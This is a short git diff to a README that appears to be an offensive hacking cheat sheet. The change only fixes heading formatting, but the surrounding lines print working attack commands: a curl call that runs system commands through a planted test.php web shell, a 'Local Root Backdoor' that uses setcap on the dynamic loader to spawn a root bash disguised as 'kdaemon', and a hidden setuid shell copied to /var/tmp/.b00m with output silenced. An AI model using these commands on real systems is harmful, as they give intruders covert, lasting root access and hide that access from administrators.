diff --git a/README.md b/README.md
index 820fdcc..1bc74f5 100644
--- a/README.md
+++ b/README.md
@@ -1626,7 +1626,7 @@ curl http://127.0.0.1:8080/test.php -d 0="ps fax; uname -mrs; id"
 <a id="ld-backdoor"></a>
 **6.v. Local Root Backdoor**
 
-###1. Backdooring the dynamic loader with setcap
+### 1. Backdooring the dynamic loader with setcap
 
 ```bash
 ### Execute as ROOT user
@@ -1642,7 +1642,7 @@ command -v python3 >/dev/null && p="python3"
 exec "${fn:?}" "$p" -c 'import os;os.setgid(0);os.setuid(0);os.execlp("bash", "kdaemon")'
 ```
 
-###2. Good old b00m shell
+### 2. Good old b00m shell
 
 ```shell
 { cp /bin/sh /var/tmp/.b00m; chmod 6775 /var/tmp/.b00m; } 2>/dev/null >/dev/null